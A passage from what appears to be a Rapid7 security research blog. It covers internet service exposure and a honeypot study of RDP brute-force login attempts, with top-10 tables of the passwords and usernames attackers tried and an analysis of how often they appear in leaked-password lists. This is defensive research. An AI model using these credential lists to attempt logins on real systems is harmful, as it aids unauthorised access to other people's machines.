internet? You probably can guess the top two, but did you know that #7 is telnet? Yep, there are 15 million good old, reliable, usually unencrypted telnet out there, offering shells to anyone who cares to peek in on the cleartext password as it's being used. We found some weird things on the national level, too. For instance, about 75% of the servers offering SMB/CIFS services - a (usually) Microsoft service for file sharing and remote administration for Windows machines -  reside in just six countries: the United States, China, Hong Kong, Belgium, Australia and Poland. It's facts like these that made us realize that we have a fundamental gap in our awareness of the services deployed on the public side of firewalls the world over. This gap, in turn, makes it hard to truly understand what the internet is. So, the paper and the associated data we collected (and will continue to collect) can help us all get an understanding of what makes up one of the most significant technologies in use on Planet Earth. So, you can score a copy of the paper, full of exciting graphs (and absolutely zero pie charts!) here. Or, if you're of a mind to dig into the data behind those graphs, you can score the summary data here and let us know what is lurking in there that you found surprising, shocking, or sobering.

The Attacker's Dictionary

Rapid7 is publishing a report about the passwords attackers use when they scan the internet indiscriminately. You can pick up a copy at booth #4215 at the RSA Conference this week, or online right here. The following post describes some of what is investigated in…

Rapid7 is publishing a report about the passwords attackers use when they scan the internet indiscriminately. You can pick up a copy at booth #4215 at the RSA Conference this week, or online right here. The following post describes some of what is investigated in the report.
Announcing the Attacker's Dictionary
Rapid7's Project Sonar periodically scans the internet across a variety of ports and protocols, allowing us to study the global exposure to common vulnerabilities as well as trends in software deployment (this analysis of binary executables stems from Project Sonar). As a complement to Project Sonar, we run another project called Heisenberg which listens for scanning activity. Whereas Project Sonar sends out lots of packets to discover what is running on devices connected to the Internet, Project Heisenberg listens for and records the packets being sent by Project Sonar and other Internet-wide scanning projects. The datasets collected by Project Heisenberg let us study what other people are trying to examine or exploit. Of particular interest are scanning projects which attempt to use credentials to log into services that we do not provide. We cannot say for sure what the intention is of a device attempting to log into a nonexistent RDP server running on an IP address which has never advertised its presence, but we believe that behavior is suspect and worth analyzing.
How Project Heisenberg Works
Project Heisenberg is a collection of low-interaction honeypots deployed around the world. The honeypots run on IP addresses which we have not published, and we expect that the only traffic directed to the honeypots would come from projects or services scanning a wide range of IP addresses. When an unsolicited connection attempt is made to one of our honeypots, we store all the data sent to the honeypot in a central location for further analysis. In this post we will explore some of the data we have collected related to Remote Desktop Protocol (RDP) login attempts.
RDP Summary Data
We have collected RDP passwords over a 334-day period, from 2015-03-12 to 2016-02-09. During that time we have recorded 221,203 different attempts to log in, coming from 5,076 distinct IP addresses across 119 different countries, using 1,806 different usernames and 3,969 different passwords. Because it wouldn't be a discussion of passwords without a top 10 list, the top 10 passwords that we collected are:
password count percent
x 11865 5.36%
Zz 10591 4.79%
St@rt123 8014 3.62%
1 5679 2.57%
P@ssw0rd 5630 2.55%
bl4ck4ndwhite 5128 2.32%
admin 4810 2.17%
alex 4032 1.82%
....... 2672 1.21%
administrator 2243 1.01%
And because we have information not only about passwords, but also about the usernames that are being used, here are the top 10 that were collected:
username count percent
administrator 77125 34.87%
Administrator 53427 24.15%
user1 8575 3.88%
admin 4935 2.23%
alex 4051 1.83%
pos 2321 1.05%
demo 1920 0.87%
db2admin 1654 0.75%
Admin 1378 0.62%
sql 1354 0.61%
We see on average 662.28 login attempts every day, but the actual daily number varies quite a bit. The chart below shows the number of events per day since we started collecting data. Notice the heavy activity in the first four months, which skews the average high. In addition to the username and password being used in the login attempts that we captured, we also collected the IP address of the device making the login attempt.
To the best of the ability of the GeoIP database we used, here are the top 15 countries from which the collected login attempts originate: country country code count percent China CN 88227 39.89% United States US 54977 24.85% South Korea KR 13182 5.96% Netherlands NL 10808 4.89% Vietnam VN 6565 2.97% United Kingdom GB 3983 1.80% Taiwan TW 3808 1.72% France FR 3709 1.68% Germany DE 2488 1.12% Canada CA 2349 1.06% With the data broken down by country, we can recreate the chart above to show activity by country for the top 5 countries: RDP Highlights There is even more information to be found in this data beyond counting passwords, usernames and countries. We guess that these passwords are selected because whomever is conducting these scans believes that there is a chance they will work. Maybe the scanners have inside knowledge about actual usernames and passwords in use, or maybe they're just using passwords that have been made available from previous security breaches in which account credentials were leaked. In order to look into this, we compared all the passwords collected by Project Heisenberg to passwords listed in two different collections of leaked passwords. The first is a list of passwords collected from leaked password databases by Crackstation. The second list comes from Mark Burnett. In the table below we list how many of the top N passwords are found in these password lists: top password count num in any list percent 1 1 100.00% 2 2 100.00% 3 2 66.67% 4 3 75.00% 5 4 80.00% 10 8 80.00% 50 28 56.00% 100 55 55.00% 1000 430 43.00% 3969 1782 44.90% This means that 8 of the 10 most frequently used passwords were also found in published lists of leaked passwords. But looking back at the top 10 passwords above, they are not very complex and so it is not surprising that they appear in a list of leaked passwords. This observation prompted us to look at the complexity of the passwords we collected. Just about any time you sign up for a service on the internet – be it a social networking site, an online bank, or a music streaming service – you will be asked to provide a username and password. Many times your chosen password will be evaluated during the signup process and you will be given feedback about how suitable or secure it is. Password evaluation is a tricky and inexact art that consists of various components. Some of the many aspects that a password evaluator may take into consideration include: length presence of dictionary words runs of characters (aaabbbcddddd) presence of non alphanumeric characters (!@#$%^&*) common substitutions (1 for l [lowercase L], 0 for O [uppercase o]) Different password evaluators will place different values on each of these (and other) characteristics to decide whether a password is "good" or "strong" or "secure". We looked at a few of these password evaluators, and found zxcvbn to be well documented and maintained, so we ran all the passwords through it to compute a complexity score for each one. We then looked at how password complexity is related to finding a password in a list of leaked passwords. complexity # passwords % crackstation crackstation % Burnnet Burnett % any any % all all % 0 803 20.23 726 90.41 564 70.24 728 90.66 562 69.99 1 1512 38.10 898 59.39 634 41.93 939 62.10 593 39.22 2 735 18.52 87 11.84 37 5.03 94 12.79 30 4.08 3 567 14.29 13 2.29 5 0.88 13 2.29 5 0.88 4 352 8.87 7 1.99 4 1.14 8 2.27 3 0.85 The above table shows the complexity of the collected passwords, as well as how many were found in different password lists. 
For instance, with complexity level 4, there were 352 passwords classified as being that complex, 7 of which were found in the crackstation list, and 4 of which were found in the Burnett list. Furthermore, 8 of the passwords were found in at least one of the password lists, meaning that if you had all the password lists, you would find 2.27% of the passwords classified as having a complexity value of 4. Similarly, looking across all the password lists, you would find 3 (0.85%) passwords present in each of the lists. From this we extrapolate that as passwords get more complex, fewer and fewer are found in the lists of leaked passwords. Since we see that attackers try passwords that are stupendously simple, like single-character passwords, and much more complex passwords that are typically not found in the usual password lists, we can surmise that these attackers are not tied to these lists in any practical way -- they clearly have other sources for likely credentials to try. Finally, we wanted to know what the population of possible targets looks like. How many endpoints on the internet have an RDP server running, waiting for connections? Since we have experience from Project Sonar, on 2016-02-02 the Rapid7 Labs team ran a Sonar scan to see how many IPs have port 3389 open and listening for TCP traffic. We found that 10,822,679 different IP addresses meet that criterion, spread out all over the world.
So What?
With this dataset we can learn about how people looking to log into RDP servers operate. We have much more detail in the report, but some of our findings include:
We see that many times a day, every day, our honeypots are contacted by a variety of entities.
We see that many of these entities try to log into an RDP service which is not there, using a variety of credentials.
We see that a majority of the login attempts use simple passwords, most of which are present in collections of leaked passwords.
We see that as passwords get more complex, they are less and less likely to be present in collections of leaked passwords.
We see that there is a significant population of RDP-enabled endpoints connected to the internet.
But wait, there's more! If this interests you and you would like to learn more, come talk to us at booth #4215 at the RSA Conference.
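As a postscript for anyone who wants to reproduce the complexity scoring above, here is a small sketch using the Python port of zxcvbn (pip install zxcvbn); the passwords and the tiny leaked-list stand-in are illustrative only:

```python
from zxcvbn import zxcvbn  # Python port of the zxcvbn estimator used in the study

# A toy stand-in for the leaked-password collections; the real lists are enormous.
leaked = {"x", "P@ssw0rd", "admin", "administrator"}

for password in ["x", "St@rt123", "P@ssw0rd", "bl4ck4ndwhite", "9r&wQz!m42#Lp"]:
    score = zxcvbn(password)["score"]  # 0 (weakest) through 4 (strongest)
    print(f"{password!r:20} complexity={score}  in leaked list: {password in leaked}")
```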

Featured Research

National Exposure Index 2017

The National Exposure Index is an exploration of data derived from Project Sonar, Rapid7's security research project that gains insights into global exposure to common vulnerabilities through internet-wide surveys.

Learn More

Upcoming Event

UNITED 2017

Rapid7's annual security summit is taking place September 12-14, 2017 in Boston, MA. Join industry peers for candid talks, focused trainings, and roundtable discussions that accelerate innovation, reduce risk, and advance your business.

Register Now

Podcast

Security Nation

Security Nation is a podcast dedicated to covering all things infosec – from what's making headlines to practical tips for organizations looking to improve their own security programs. Host Kyle Flaherty has been knee-deep in the security sector for nearly two decades. At Rapid7 he leads a solutions-focused team with the mission of helping security professionals do their jobs.

Listen Now